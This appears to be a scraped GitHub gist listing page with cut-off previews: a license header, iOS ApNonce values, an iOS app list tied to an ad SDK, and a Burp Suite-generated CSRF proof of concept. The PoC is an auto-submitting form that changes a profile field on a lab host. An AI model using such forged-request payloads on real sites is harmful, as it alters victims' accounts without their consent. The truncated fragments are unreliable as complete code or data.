Skip to content

Instantly share code, notes, and snippets.

/*
* The MIT License (MIT)
*
* Copyright (c) 2016 Pupyshev Nikita
*
* Permission is hereby granted, free of charge, to any person obtaining a copy of
* this software and associated documentation files (the "Software"), to deal in
* the Software without restriction, including without limitation the rights to
* use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
* the Software, and to permit persons to whom the Software is furnished to do so,
@chilik
chilik / iPhone6,1 iOS10.2 nonces
Created December 25, 2016 09:53
iPhone 5S iOS 10.2 551 nonces (created by @_coreDump)
000001 ApNonce=2bc60789d0042742e4500648c6e3967cb11f8441
000002 ApNonce=56f9add4b374428d2c2d096ff3eb6dbba0c2c462
000003 ApNonce=9f4aeec726e7c682339ddb3c6c2dec52662dc517
000004 ApNonce=70e7eef71cd9822f707dbb215425ff1c9b5aa097
000005 ApNonce=9f4aeec726e7c682339ddb3c6c2dec52662dc517
000006 ApNonce=e35948fd9400e7c4732ac2199bf379de81589e59
000007 ApNonce=dda6ec95a9b5789ec2182125df2e045938ac7539
000008 ApNonce=9e4c518009d00df190a450b3b47691768812360c
000009 ApNonce=9e4c518009d00df190a450b3b47691768812360c
000010 ApNonce=40a5665ecb22fb124adc4885d25d219f8c295b55
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://windows:5000/profile?_______________________________________________________________________________________________________________________________&user=admin" method="POST">
<input type="hidden" name="ssn" value="007" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
@chilik
chilik / gist:11ffc141c0830ce6d8cea77bc1cdcf13
Last active June 14, 2016 18:47
A quick list of iOS apps implementing the Vpon SDK #PwndByVpon by Chilik Tamir @ Mi3Security
"version":"1.9","bundle_id":"com.cna.focustaiwanforiphone"
"version":"1.1.2","bundle_id":"moc.e-nikpmup.EvilLaboratory"
"version":"1.0.2","bundle_id":"com.umore.CardShare"
"version":"4.1","bundle_id":"com.aotter.PNN"
"version":"1.1.4","bundle_id":"com.livpage.fanpiece"
"version":"1.0.8","bundle_id":"com.chocolabs.railway"
"version":"1.5.0.1","bundle_id":"com.keke.KomicaReader"
"version":"1.4","bundle_id":"com.ashinet.Costcobbs"
"version":"1.0.3","bundle_id":"com.lbj.ShoppingGood2New"
"version":"1.0.0","bundle_id":"com.sapp.quote"